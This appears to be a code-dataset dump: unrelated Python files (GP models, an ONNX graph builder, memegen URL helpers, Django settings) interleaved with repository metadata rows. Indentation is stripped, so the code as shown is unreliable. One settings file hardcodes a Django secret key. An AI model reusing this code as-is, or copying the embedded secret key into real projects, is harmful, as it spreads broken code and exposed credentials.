elif type(referenceDomain) is pinm.Node:
otherDomain.append(referenceDomain)
nodes=findNodes(position,otherDomain,searchDepth=temp_searchDepth)
elif (type(referenceDomain) is not pinm.Node) and searchDepth!=0:
nodes=findNodes(position,referenceDomain.subDomain,searchDepth=(temp_searchDepth-1))
else:
nodes=referenceDomain
return nodes
else:
nodes=[]
for domain in domainList:
toAdd=True
if bool(domain.pos):
if type(domain) is not pinm.Node:
maxDistance=domain.maxDistance
else:
maxDistance={}
for coords in position:
maxDistance[coords]=0.
for coords in position:
if np.absolute(position[coords]-domain.pos[coords])>(maxDistance[coords]+distance[coords]):
toAdd=False
if toAdd:
if type(domain) is not pinm.Node:
for temp_nodes in findNodes(position,domain.subDomain,distance):
nodes.append(temp_nodes)
else:
nodes.append(domain)
return nodes
def addDictionary(a):
result={}
for dicts in a:
for key in dicts:
if key in result:
result[key]+=dicts[key]
else:
result[key]=dicts[key]
return result
def multiplyDictionary(a,b):
result={}
for key in a:
result[key]=a[key]*b
return result
def plotNodes(nodes,coordinate=['x','y','z'],variableIdentifier='',complex='real'):
figure = pyplot.figure()
axes = mplot3d.Axes3D(figure)
coordinateKey=[]
var=[]
numOfNodes=len(nodes)
coords=np.zeros((3,numOfNodes))
for n in range(numOfNodes):
for m in range(len(coords)):
coords[m][n]=nodes[n].pos[coordinate[m]]
if variableIdentifier!='':
if complex=='real':
var.append(nodes[n].variable[variableIdentifier].real)
elif complex=='imag':
var.append(nodes[n].variable[variableIdentifier].imag)
elif complex=='abs':
var.append(np.absolute(nodes[n].variable[variableIdentifier]))
if variableIdentifier!='':
cm = pyplot.get_cmap('jet')
cNorm = Colors.Normalize(vmin=min(var), vmax=max(var))
scalarMap = cmx.ScalarMappable(norm=cNorm, cmap=cm)
axes.scatter(coords[0], coords[1], coords[2],c=scalarMap.to_rgba(var))
scalarMap.set_array(var)
figure.colorbar(scalarMap)
else:
axes.scatter(coords[0], coords[1], coords[2])
pyplot.show()
class DomainSelector:
def __init__(self,collectionList):
self.ind = 0
self.collectionList=collectionList
self.selectedIndex=[]
self.domainInfo=[]
self.domainCount=1
self.end=False
self.keyFunc={'l':self.nextFunc,
'k':self.prevFunc,
's':self.selectFunc,
'a':self.addToDomainFunc}
for n in collectionList:
self.selectedIndex.append(False)
self.domainInfo.append(0)
self.maxIndex=len(collectionList)-1
def next(self, event):
self.nextFunc()
def prev(self, event):
self.prevFunc()
def select(self, event):
self.selectFunc()
self.nextFunc()
def addToDomain(self, event):
self.addToDomainFunc()
def swapSelected(self, event):
self.swapSelectedFunc()
# def keyPressed(self,event):
# self.keyFunc[event.key]() #find code error
def nextFunc(self):
if not(self.end):
if self.selectedIndex[self.ind]:
self.collectionList[self.ind].set_facecolor('g')
else:
self.collectionList[self.ind].set_facecolor('b')
self.ind += 1
if self.ind>self.maxIndex:
self.ind = 0
while self.domainInfo[self.ind]!=0:
self.ind += 1
if self.ind>self.maxIndex:
self.ind = 0
if self.selectedIndex[self.ind]:
self.collectionList[self.ind].set_facecolor('r')
else:
self.collectionList[self.ind].set_facecolor('k')
pyplot.draw()
def prevFunc(self):
if not(self.end):
if self.selectedIndex[self.ind]:
self.collectionList[self.ind].set_facecolor('g')
else:
self.collectionList[self.ind].set_facecolor('b')
self.ind -= 1
if self.ind<0:
self.ind = self.maxIndex
while self.domainInfo[self.ind]!=0:
self.ind -= 1
if self.ind<0:
self.ind = self.maxIndex
if self.selectedIndex[self.ind]:
self.collectionList[self.ind].set_facecolor('r')
else:
self.collectionList[self.ind].set_facecolor('k')
pyplot.draw()
def selectFunc(self):
if not(self.end):
if self.selectedIndex[self.ind]:
self.collectionList[self.ind].set_facecolor('k')
self.selectedIndex[self.ind]=False
else:
self.collectionList[self.ind].set_facecolor('r')
self.selectedIndex[self.ind]=True
pyplot.draw()
def addToDomainFunc(self):
for n in range(len(self.selectedIndex)):
if self.selectedIndex[n]:
self.selectedIndex[n]=False
self.domainInfo[n]=self.domainCount
self.collectionList[n].set_facecolor('none')
self.domainCount +=1
self.end=True
for n in range(len(self.domainInfo)):
if self.domainInfo[n]==0:
self.ind = n
self.collectionList[self.ind].set_facecolor('k')
self.end=False
break
pyplot.draw()
def swapSelectedFunc(self):
for n in range(len(self.selectedIndex)):
if self.domainInfo[n]==0:
if self.selectedIndex[n]:
self.selectedIndex[n]=False
if n==self.ind:
self.collectionList[n].set_facecolor('k')
else:
self.collectionList[n].set_facecolor('b')
else:
self.selectedIndex[n]=True
if n==self.ind:
self.collectionList[n].set_facecolor('r')
else:
self.collectionList[n].set_facecolor('g')
pyplot.draw()
| 43.626917
| 189
| 0.619821
| 4,029
| 0.157328
| 0
| 0
| 0
| 0
| 0
| 0
| 1,045
| 0.040806
|
7735b7ce4419d727877113722c02541feac1a135
| 881
|
py
|
Python
|
app/utils/urls.py
|
withshubh/memegen
|
9667e0c6737334ca8ceb4347792e3df39ae52b3a
|
[
"MIT"
] | null | null | null |
app/utils/urls.py
|
withshubh/memegen
|
9667e0c6737334ca8ceb4347792e3df39ae52b3a
|
[
"MIT"
] | 1
|
2017-01-12T23:17:27.000Z
|
2017-01-12T23:17:27.000Z
|
app/utils/urls.py
|
withshubh/memegen
|
9667e0c6737334ca8ceb4347792e3df39ae52b3a
|
[
"MIT"
] | 1
|
2016-10-31T23:19:15.000Z
|
2016-10-31T23:19:15.000Z
|
from urllib.parse import parse_qs, urlencode, urlparse
from .. import settings
def normalize(request, url: str) -> str:
parts = urlparse(url)
url = f"{settings.BASE_URL}{parts.path}"
if "background" in parts.query:
background = parse_qs(parts.query)["background"][0]
else:
background = ""
query = params(request, background=background)
if query:
url += "?" + urlencode(query)
return clean(url)
def params(request, **kwargs) -> dict:
return {k: v for k, v in kwargs.items() if v}
def clean(url: str) -> str:
url = _unquote_slashes(url)
url = _drop_trailing_spaces(url)
return url
def _unquote_slashes(url: str) -> str:
return url.replace("%3A%2F%2F", "://").replace("%2F", "/")
def _drop_trailing_spaces(url: str) -> str:
while "/_." in url:
url = url.replace("/_.", ".")
return url
| 23.810811
| 62
| 0.61975
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 100
| 0.113507
|
7736dad67e1bf0f9644b352cfa50dc3d03404717
| 211
|
py
|
Python
|
src/westpa/core/reweight/__init__.py
|
burntyellow/adelman_ci
|
cca251a51b34843faed0275cce01d7a307829993
|
[
"MIT"
] | 140
|
2015-01-07T23:30:36.000Z
|
2022-03-28T17:15:30.000Z
|
lib/west_tools/westpa/reweight/__init__.py
|
burntyellow/westpa
|
9dc62478fcef0001b9c038cd56a40b6be1b9d64a
|
[
"MIT"
] | 157
|
2015-01-03T03:38:36.000Z
|
2022-03-31T14:12:16.000Z
|
lib/west_tools/westpa/reweight/__init__.py
|
burntyellow/westpa
|
9dc62478fcef0001b9c038cd56a40b6be1b9d64a
|
[
"MIT"
] | 56
|
2015-01-02T21:21:40.000Z
|
2022-03-03T16:27:54.000Z
|
'''
Function(s) for the postanalysis toolkit
'''
import logging
log = logging.getLogger(__name__)
from . import _reweight
from ._reweight import (stats_process, reweight_for_c)
from .matrix import FluxMatrix
| 17.583333
| 54
| 0.781991
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 48
| 0.227488
|
7738b7fae9ef9456645f45d2e182dbc304825ba1
| 1,573
|
py
|
Python
|
src/hydro/conf/settings_base.py
|
aolarchive/Hydro
|
8580aebc30694156c436e5ba7470d3fcbb46896b
|
[
"MIT"
] | 42
|
2015-03-04T09:05:00.000Z
|
2018-12-01T15:13:48.000Z
|
src/hydro/conf/settings_base.py
|
aolarchive/Hydro
|
8580aebc30694156c436e5ba7470d3fcbb46896b
|
[
"MIT"
] | 5
|
2015-05-11T08:18:12.000Z
|
2016-03-22T19:11:01.000Z
|
src/hydro/conf/settings_base.py
|
Convertro/Hydro
|
8580aebc30694156c436e5ba7470d3fcbb46896b
|
[
"MIT"
] | 4
|
2015-03-05T09:07:27.000Z
|
2018-12-01T15:13:49.000Z
|
# Hydro settings
TIME_ZONE = 'UTC'
LANGUAGE_CODE = 'en-us'
APPLICATION_NAME = 'HYDRO'
SECRET_KEY = '8lu*6g0lg)9w!ba+a$edk)xx)x%rxgb$i1&022shmi1jcgihb*'
# SESSION_TIMEOUT is used in validate_session_active decorator to see if the
# session is active.
SECOND = 1
MINUTE = SECOND * 60
SECONDS_IN_DAY = SECOND*86400
MYSQL_CACHE_DB = 'cache'
MYSQL_STATS_DB = 'stats'
MYSQL_CACHE_TABLE = 'hydro_cache_table'
CACHE_IN_MEMORY_KEY_EXPIRE = 600
CACHE_DB_KEY_EXPIRE = 86400
USE_STATS_DB = False
DATABASES = {
'stats': {
'ENGINE': 'django.db.backends.mysql',
'NAME': MYSQL_STATS_DB,
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
},
},
'cache': {
'ENGINE': 'django.db.backends.mysql',
'NAME': MYSQL_CACHE_DB,
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
},
},
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'cache',
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
}
},
}
| 26.661017
| 113
| 0.591863
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 856
| 0.544183
|
7738eed30266f468e9290a38da24497ebf1d541d
| 357
|
py
|
Python
|
project/Fast/django/decorators/auth.py
|
fael07/DRF-Project
|
f65b4177e56e7209d2369ba9d6d81bfe00321052
|
[
"MIT"
] | null | null | null |
project/Fast/django/decorators/auth.py
|
fael07/DRF-Project
|
f65b4177e56e7209d2369ba9d6d81bfe00321052
|
[
"MIT"
] | null | null | null |
project/Fast/django/decorators/auth.py
|
fael07/DRF-Project
|
f65b4177e56e7209d2369ba9d6d81bfe00321052
|
[
"MIT"
] | null | null | null |
from ...forms.checks import check_is_logged
from django.shortcuts import redirect
def no_login_required(view_function):
def exec_view_function(*args, **kwargs):
request = args[0]
if check_is_logged(request):
return redirect('/')
return view_function(*args, **kwargs)
return exec_view_function
| 23.8
| 47
| 0.661064
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3
| 0.008403
|
773934d535052c5583666741f88c9dfe16421a75
| 12,000
|
py
|
Python
|
gp_models.py
|
deepmind/active_ops
|
5c7b24515adadbaf89feb84232190bad96221c04
|
[
"Apache-2.0"
] | 13
|
2021-12-03T19:24:11.000Z
|
2022-03-17T11:14:11.000Z
|
gp_models.py
|
deepmind/active_ops
|
5c7b24515adadbaf89feb84232190bad96221c04
|
[
"Apache-2.0"
] | 1
|
2022-01-19T06:48:02.000Z
|
2022-01-19T06:48:02.000Z
|
gp_models.py
|
deepmind/active_ops
|
5c7b24515adadbaf89feb84232190bad96221c04
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 DeepMind Technologies Limited.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gaussian process model at discrete indices."""
from typing import Sequence, Union
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
tfk = tfp.math.psd_kernels
class DistributionWrapper(object):
"""Helper class for MVNormal model with mean and stddev methods."""
def __init__(self, mean, stddev):
self._mean = mean
self._stddev = stddev
def mean(self):
return self._mean
def stddev(self):
return self._stddev
class GaussianProcess(object):
"""Gaussian process model at discrete indices."""
def __init__(self,
num_indices: int,
kernel: tfk.PositiveSemidefiniteKernel,
offset: Union[float, tf.Tensor, tf.Variable],
variance: Union[float, tf.Tensor, tf.Variable]):
"""Creates a model for a stochastic process.
Args:
num_indices: integer, the number of discrete indices.
kernel: An instance of
`tfp.positive_semidefinite_kernels.PositiveSemidefiniteKernels`. The
type of the kernel will be used to cast the inputs and outputs of the
model.
offset: Scalar, offset the observations by this amount.
variance: variance of the Gaussian observation noise.
"""
self._n_xs = num_indices
self._kernel = kernel
self._offset = offset
self._dtype = kernel.dtype
self._variance = variance
# self._xs is not supposed to change and is treated as constants.
self._xs = tf.range(self.n_xs, dtype=self._dtype)[:, None]
# These values will be updated and are treated as variables.
self._ys_num = tf.Variable(tf.zeros(self.n_xs, dtype=self._dtype),
trainable=False)
self._ys_mean = tf.Variable(tf.zeros(self.n_xs, dtype=self._dtype),
trainable=False)
self._ys_sq_mean = tf.Variable(tf.zeros(self.n_xs, dtype=self._dtype),
trainable=False)
def add(self, xs, ys):
"""Adds a batch of observations to the model.
Args:
xs: An array (or equivalent) of shape `[B, input_dim]`, where `B` is an
arbitrary batch dimension, and `input_dim` must be compatible with
the trailing dimension of the already fed in observations (if any).
ys: An array (or equivalent) of shape `[B]` or `[B, 1]`,
where `B` is an arbitrary batch dimension.
"""
xs = np.asarray(xs, self._dtype)
ys = np.asarray(ys, self._dtype)
if ys.ndim > 2 or (ys.ndim == 2 and ys.shape[1] > 1):
raise ValueError('ys must have a shape of [B] or [B, 1]')
ys = ys.ravel()
ys_num = self._ys_num.numpy()
ys_mean = self._ys_mean.numpy()
ys_sq_mean = self._ys_sq_mean.numpy()
for x, y in zip(xs, ys):
i = int(x[0])
ys_num[i] += 1.
ys_mean[i] += (y - ys_mean[i]) / ys_num[i]
ys_sq_mean[i] += (y ** 2 - ys_sq_mean[i]) / ys_num[i]
self._ys_num.assign(ys_num)
self._ys_mean.assign(ys_mean)
self._ys_sq_mean.assign(ys_sq_mean)
def index(self, index_points, latent_function: bool = False):
"""Compute the marginal posterior distribution at the given `index_points`.
Args:
index_points: A Tensor (or equivalent) of shape `[B, input_dim]`, where
`B` is an arbitrary batch dimension, and `input_dim` must be compatible
with the trailing dimension of the already fed in observations (if any).
latent_function: If True, return the distribution of the latent
function value at index points without observation noise. Otherwise,
return the distribution of noisy observations.
Returns:
An object with mean and stddev methods.
"""
_, post_mean, post_var = self._marginal_and_posterior()
index_points = tf.squeeze(tf.cast(index_points, tf.int32), axis=1)
post_mean = tf.gather(post_mean, index_points)
post_var = tf.gather(post_var, index_points)
if not latent_function:
post_var += self._variance
return DistributionWrapper(post_mean, tf.sqrt(post_var))
def loss(self):
"""The negative log probability of the observations under the GP."""
log_marg, _, _ = self._marginal_and_posterior(margin_only=True)
return -log_marg
@property
def n_xs(self):
"""Returns the number of unique indices."""
return self._n_xs
@property
def n_observations(self):
"""Returns the number of observations used by the model."""
return tf.reduce_sum(self._ys_num)
def _merge_observations(self):
"""Merge observations at the same index into a single observation."""
# Observations.
ys_mean = self._ys_mean - self._offset
ys_var = self._variance # Scalar.
ys_s = self._ys_sq_mean - tf.square(self._ys_mean) # Empirical variance.
# Filter indices without observations.
index_mask = tf.greater(self._ys_num, 0)
xs = tf.boolean_mask(self._xs, index_mask)
n_xs = tf.cast(tf.shape(xs)[0], self._dtype)
ys_mean = tf.boolean_mask(ys_mean, index_mask)
ys_s = tf.boolean_mask(ys_s, index_mask)
ys_num = tf.boolean_mask(self._ys_num, index_mask)
o_mean = ys_mean
o_var = ys_var / ys_num
# Additional likelihood term inside exp(-1/2(.)).
extra_term = -0.5 * tf.reduce_sum(ys_num / ys_var * ys_s)
# Additional likelihood term of 1/\sqrt(2\pi * var)
extra_term += -0.5 * (
tf.math.log(2.0 * np.pi) * (self.n_observations - n_xs)
+ tf.math.log(ys_var) * self.n_observations
- tf.reduce_sum(tf.math.log(o_var)))
return index_mask, xs, o_mean, o_var, extra_term
@tf.function
def _marginal_and_posterior(self, margin_only=False):
"""Compute marginal log-likelihood and posterior mean and variance."""
index_mask, xs, o_mean, o_var, extra_term = self._merge_observations()
n_xs = tf.cast(tf.shape(xs)[0], self._dtype)
log_marg = extra_term - 0.5 * tf.math.log(2.0 * np.pi) * n_xs
# K + sigma2*I or K + Sigma (with Sigma diagonal) matrix
# where X are training or inducing inputs
k_x_all = self._kernel.matrix(xs, self._xs)
k_xx = tf.boolean_mask(k_x_all, index_mask, axis=1)
k = k_xx + tf.linalg.diag(o_var)
chol = tf.linalg.cholesky(k)
# L^{-1} \mu
a = tf.linalg.triangular_solve(chol, tf.expand_dims(o_mean, 1), lower=True)
log_marg += (
-tf.reduce_sum(tf.math.log(tf.linalg.diag_part(chol)))
- 0.5 * tf.reduce_sum(tf.square(a)))
log_marg = tf.reshape(log_marg, [-1])
if margin_only:
return (log_marg,
tf.zeros((), dtype=self._dtype),
tf.zeros((), dtype=self._dtype))
# predict at the training inputs X
a2 = tf.linalg.triangular_solve(chol, k_x_all, lower=True)
# posterior variance
k_all_diag = self._kernel.apply(self._xs, self._xs)
post_var = k_all_diag - tf.reduce_sum(tf.square(a2), 0)
# posterior mean
post_mean = tf.squeeze(tf.matmul(a2, a, transpose_a=True), axis=1)
post_mean = post_mean + self._offset
return log_marg, post_mean, post_var
def sample(self):
"""Compute marginal log-likelihood and posterior mean and variance."""
index_mask, _, o_mean, o_var, _ = self._merge_observations()
# K + sigma2*I or K + Sigma (with Sigma diagonal) matrix
# where X are training or inducing inputs
k_all_all = self._kernel.matrix(self._xs, self._xs)
k_x_all = tf.boolean_mask(k_all_all, index_mask)
k_xx = tf.boolean_mask(k_x_all, index_mask, axis=1)
k = k_xx + tf.linalg.diag(o_var)
chol = tf.linalg.cholesky(k)
# L^{-1} \mu
a = tf.linalg.triangular_solve(chol, tf.expand_dims(o_mean, 1), lower=True)
# predict at the training inputs X
a2 = tf.linalg.triangular_solve(chol, k_x_all, lower=True)
# posterior mean
post_mean = tf.squeeze(tf.matmul(a2, a, transpose_a=True), axis=1)
post_mean = post_mean + self._offset
# full posterior covariance matrix.
post_var = k_all_all - tf.matmul(a2, a2, transpose_a=True)
mvn = tfd.MultivariateNormalTriL(
loc=post_mean, scale_tril=tf.linalg.cholesky(post_var))
return mvn.sample()
class GaussianProcessWithSideObs(GaussianProcess):
"""Gaussian process model at discrete indices and side observations."""
def __init__(self,
num_indices: int,
kernel: tfk.PositiveSemidefiniteKernel,
offset: Union[float, tf.Tensor, tf.Variable],
variance: Union[float, tf.Tensor, tf.Variable],
side_observations: Sequence[Sequence[float]],
side_observations_variance: Union[float, Sequence[float],
Sequence[Sequence[float]],
tf.Tensor, tf.Variable]):
"""Creates a model for a stochastic process.
Args:
num_indices: integer, the number of discrete indices.
kernel: An instance of
`tfp.positive_semidefinite_kernels.PositiveSemidefiniteKernels`. The
type of the kernel will be used to cast the inputs and outputs of the
model.
offset: Scalar, offset the observations by this amount.
variance: variance of the Gaussian observation noise.
side_observations: [num_side_observation_per_index, num_indices] array of
side observations.
side_observations_variance: side observation variances of the same shape
as side_observations or can be broadcast to the same shape.
"""
super().__init__(num_indices=num_indices,
kernel=kernel,
offset=offset,
variance=variance)
self._zs_var = side_observations_variance
# self._zs is not supposed to change and is treated as constants.
self._zs = tf.constant(side_observations, dtype=self._dtype)
if self._zs.ndim != 2:
raise ValueError('Side observation dimension must be 2.')
if self._zs.shape[1] != num_indices:
raise ValueError('Side observation dimension does not match num_indices.')
def _merge_observations(self):
"""Merge observations and side observations at the same index."""
# Observations.
ys_mean = self._ys_mean - self._offset
ys_var = self._variance # Scalar.
ys_s = self._ys_sq_mean - tf.square(self._ys_mean) # Empirical variance.
# Side observations.
zs = self._zs - self._offset
# Broadcast zs_var to have the same shape as zs.
zs_var = self._zs_var + tf.zeros_like(zs)
o_var = 1. / (tf.reduce_sum(1. / zs_var, axis=0) + self._ys_num / ys_var)
o_mean = (tf.reduce_sum(zs / zs_var, axis=0)
+ self._ys_num / ys_var * ys_mean) * o_var
# Additional likelihood term inside exp(-1/2(.)).
extra_term = -0.5 * tf.reduce_sum(
tf.reduce_sum(tf.square(zs) / zs_var, axis=0)
+ self._ys_num / ys_var * tf.square(ys_mean)
- tf.square(o_mean) / o_var
+ self._ys_num / ys_var * ys_s)
# Additional likelihood term of 1/\sqrt(2\pi * var)
extra_term += -0.5 * (
tf.math.log(2.0 * np.pi) * (
self.n_observations + (zs.shape[0] - 1) * zs.shape[1])
+ tf.reduce_sum(tf.math.log(zs_var))
+ tf.math.log(ys_var) * self.n_observations
- tf.reduce_sum(tf.math.log(o_var)))
# All the indices are returned due to the side observation.
index_mask = tf.ones(self._xs.shape[0], dtype=tf.bool)
xs = self._xs
return index_mask, xs, o_mean, o_var, extra_term
| 37.974684
| 80
| 0.66375
| 11,182
| 0.931833
| 0
| 0
| 1,680
| 0.14
| 0
| 0
| 4,553
| 0.379417
|
7739a64f5308987b56c062ce417f754ae7cdc0bb
| 13,476
|
py
|
Python
|
hpvm/projects/torch2hpvm/torch2hpvm/graph_builder.py
|
vzyrianov/hpvm-autograd
|
521cc3b684531548aea75f9fe3cc673aaa4a2e90
|
[
"Apache-2.0"
] | null | null | null |
hpvm/projects/torch2hpvm/torch2hpvm/graph_builder.py
|
vzyrianov/hpvm-autograd
|
521cc3b684531548aea75f9fe3cc673aaa4a2e90
|
[
"Apache-2.0"
] | null | null | null |
hpvm/projects/torch2hpvm/torch2hpvm/graph_builder.py
|
vzyrianov/hpvm-autograd
|
521cc3b684531548aea75f9fe3cc673aaa4a2e90
|
[
"Apache-2.0"
] | null | null | null |
from collections import defaultdict
from pathlib import Path
from typing import Dict, Iterable, List, Optional, Tuple, Union
import networkx as nx
import onnx
from . import graph_ir as g
from .onnx_attr import get_node_shape, node_attr_to_dict, node_to_shape
PathLike = Union[str, Path]
GraphT = onnx.GraphProto
NodeT = onnx.NodeProto
NodeT.__hash__ = lambda self: id(self)
NodeT.__repr__ = NodeT.__str__ = lambda self: self.name
class MarkedSubGraph:
"""A subgraph with information on how it should replace a node in a super graph.
subgraph: a nx.DiGraph subgraph
entry_edges: a list of edges from nodes "outside" to nodes in self.subgraph
exit: the exit node of the subgraph.
When this subgraph replaces a node `n`, self.exit will be connected to
whateven `n` is connected to.
"""
def __init__(self, subgraph: nx.DiGraph, entry_edges, exit) -> None:
assert all(to in subgraph for _, to, _ in entry_edges)
assert exit in subgraph
self.subgraph, self.exit = subgraph, exit
self.entry_edges = [(f, t, {"index": i}) for f, t, i in entry_edges]
@classmethod
def idiomatic_1to2(cls, node1, node2, predecessors):
"""Create an idiomatic replacement as follow:
node(arg1, arg2, arg3) -> node2(node1(arg1, arg2), arg3)"""
p0, p1, p2 = predecessors
graph = nx.DiGraph()
graph.add_edge(node1, node2, index=0)
return cls(graph, [(p0, node1, 0), (p1, node1, 1), (p2, node2, 1)], node2)
EmitNodeT = Union[MarkedSubGraph, g.DFGNode]
class DFG(object):
"""ONNX model translated into DFG with `DFGNode`s.
This class has a DFG, input/output information, and a clear traverse order
(think dominant tree), and is easier for CodeGen classes to work with."""
def __init__(self, graph: GraphT):
self._check_model(graph)
self._var_count = 0
# Build explicit DFG with ONNX nodes
onnx_graph = self._build_onnx_dfg(graph)
# Convert ONNX dfg into DFGNode DFG
self.graph = self._build_dfg(onnx_graph)
# Find out input nodes and output node (unique)
# removing dead nodes along the way if any
self.inputs, self.output = self._dce_get_io_info()
################ Interfaces:
@property
def traverse_order(self) -> List[g.DFGNode]:
"""Get topological order of computational graph by use-def relation."""
return list(nx.topological_sort(self.graph))
def node_args(self, node: g.DFGNode):
"""Get input arguments of node."""
sorted_edges = sorted(self.graph.in_edges(node, "index"), key=lambda p: p[2])
return [e[0] for e in sorted_edges]
def dump_weights(self, output_dir: PathLike) -> None:
"""Dump `WeightTensor`s into output_dir."""
output_dir = Path(output_dir)
for node in self.graph.nodes:
if not isinstance(node, g.WeightTensor):
continue
node.dump_weight(output_dir / (node.new_name + "_path.bin"))
################ Internal methods (high-level):
@staticmethod
def _check_model(onnx_graph: GraphT):
"""Check model validaty and single output (which is our limitation)"""
import warnings
from onnx import checker, onnx_cpp2py_export
# try use onnx's own model checker before converting any model
try:
checker.check_graph(onnx_graph)
except onnx_cpp2py_export.checker.ValidationError as e:
warnings.warn(str(e))
if any(len(n.output) > 1 for n in onnx_graph.node):
raise ValueError("All node must have single output")
if len(onnx_graph.output) > 1:
raise ValueError("Graph must have single output")
@staticmethod
def _build_onnx_dfg(graph: GraphT) -> nx.DiGraph:
"""Creates a DiGraph (by use-def relation) of onnx nodes from onnx GraphProto.
DiGraph is easier to use as a graph compared to GraphProto where use-def is implicit."""
ret_graph = nx.DiGraph()
onnx_defs, onnx_uses = def_use(graph.node)
node_shape = node_to_shape(graph)
node_and_attr = [(n, {"shape": shape}) for n, shape in node_shape.items()]
ret_graph.add_nodes_from(node_and_attr)
tensors = extract_tensors_from_graph(graph)
tensor_and_attr = [(t, {"shape": t.output_shape}) for t in tensors.values()]
ret_graph.add_nodes_from(tensor_and_attr)
for onnx_value_name, use_nodes in onnx_uses.items():
def_node = onnx_defs.get(onnx_value_name)
if def_node is None:
def_node = tensors[onnx_value_name]
for use_node, used_at_narg in use_nodes:
ret_graph.add_edge(def_node, use_node, index=used_at_narg)
return ret_graph
def _build_dfg(self, onnx_graph: nx.DiGraph) -> nx.DiGraph:
"""Translate _build_onnx_dfg output into DFGNode DFG.
First run some passes to process subgraphs that needs to be
processed together, then each unprocessed node is generated into
1 or more nodes."""
# Gemm in tensor_runtime does reshape automatically
# it also doesn't have a dedicated reshape operator
onnx_graph = drop_reshape_before_gemm(onnx_graph)
# For each onnx node, generate our nodes
node_to_nodes, error_nodes = {}, []
for onnx_node in nx.topological_sort(onnx_graph):
our_nodes = self._emit_node(onnx_graph, onnx_node)
if our_nodes is None:
error_nodes.append(onnx_node)
else:
node_to_nodes[onnx_node] = our_nodes
if error_nodes:
error_repr = [f"{n.name}({n.op_type})" for n in error_nodes]
if len(error_nodes) > 10: # Magic number
raise ValueError(f"Unsupported operators (first 10): {error_repr[:10]}")
else:
raise ValueError(f"Unsupported operators: {error_repr}")
# Apply node_to_nodes replacement on onnx_graph to create a new DFG
return build_graph_with_mapping(onnx_graph, node_to_nodes)
def _dce_get_io_info(self):
inputs = [n for n in self.graph if isinstance(n, g.InputTensor)]
inputs_set = set(inputs)
reachables = set()
for component in nx.connected_components(self.graph.to_undirected()):
# If any inputs goes into this subgraph, it's alive.
if set(component).intersection(inputs_set):
reachables.update(component)
unreachables = set(self.graph) - reachables
# Remove nodes unreachable from input
self.graph.remove_nodes_from(unreachables)
# Then outputs are nodes with out_degree = 0
outputs = [n for n in self.graph if self.graph.out_degree[n] == 0]
assert len(outputs) == 1
return inputs, outputs[0]
@staticmethod
def _emit_node(in_graph: nx.DiGraph, node: NodeT) -> Optional[EmitNodeT]:
output_shape = in_graph.nodes[node].get("shape")
predec = sorted_inputs(in_graph, node)
predec_shapes = [in_graph.nodes[n].get("shape") for n in predec]
if isinstance(node, g.DFGNode):
# Directly add node into return graph.
return node
attrs = node_attr_to_dict(node)
attrs["input_shapes"] = predec_shapes
attrs["output_shape"] = output_shape
if node.op_type == "Conv":
if not isinstance(predec[1], g.WeightTensor) or len(predec_shapes[1]) != 4:
return None # Only supports 2D conv with rhs being constant
# Only pass in the first 2 arguments' shapes
attrs["input_shapes"] = predec_shapes[:2]
conv_node = g.Conv2DNode(node.name, **attrs)
if len(predec) == 2:
return conv_node
# Split into conv followed by an addition
bias_node = g.BiasAddNode(
f"Bias_{node.name.split('_')[-1]}", [output_shape], output_shape
)
return MarkedSubGraph.idiomatic_1to2(conv_node, bias_node, predec)
if node.op_type in ("MatMul", "Gemm"):
attrs["input_shapes"] = predec_shapes[:2]
mul_node = g.MatMulNode(node.name, **attrs)
if node.op_type == "Gemm":
mul_node.gemm_transpose(predec)
if len(predec) == 2:
return mul_node
# Split into mul followed by an addition
bias_node = g.BiasAddNode(
f"Bias_{node.name.split('_')[-1]}", [output_shape], output_shape
)
return MarkedSubGraph.idiomatic_1to2(mul_node, bias_node, predec)
if node.op_type == "GlobalAveragePool":
input0_shape = in_graph.nodes[predec[0]]["shape"]
_, _, h, w = input0_shape
return g.AveragePool2DNode(
node.name, predec_shapes, output_shape, [1, 1], (h, w), [0, 0, 0, 0]
)
one_to_one_nodes = {
"MaxPool": g.MaxPool2DNode,
"AveragePool": g.AveragePool2DNode,
"Add": g.AddNode,
"Softmax": g.SoftMaxNode,
"Relu": g.ReluNode,
"Tanh": g.TanhNode,
"BatchNormalization": g.BatchNormalizationNode,
"Pad": g.PadNode,
"Identity": g.IdentityNode,
"Flatten": g.FlattenNode,
}
if node.op_type not in one_to_one_nodes:
return None
try:
return one_to_one_nodes[node.op_type](node.name, **attrs)
except (TypeError, KeyError, ValueError, RuntimeError):
node_class = one_to_one_nodes[node.op_type]
raise ValueError(f"Node ({node_class}) creation failed")
def def_use(nodes: Iterable) -> Tuple[dict, dict]:
"""Computes def/use relation from a list of node.
This method is duck-typed and operates on any node defining .input and .output.
"""
defs, uses = {}, defaultdict(list)
for n in nodes:
for i, input_ in enumerate(n.input):
uses[input_].append((n, i))
for output in n.output:
defs[output] = n
return defs, uses
def drop_reshape_before_gemm(graph: nx.DiGraph) -> nx.DiGraph:
"""Look for a shape-gather-unsqueeze-concat-reshape chain and replace that with flatten."""
for node in list(graph.nodes):
if node.op_type != "Reshape":
continue
reshape_input, target_shape = sorted_inputs(graph, node)
if not isinstance(target_shape, g.WeightTensor): # Not constant shape, nope
continue
n_gemm = get_next_in_chain(graph, "Gemm", node)
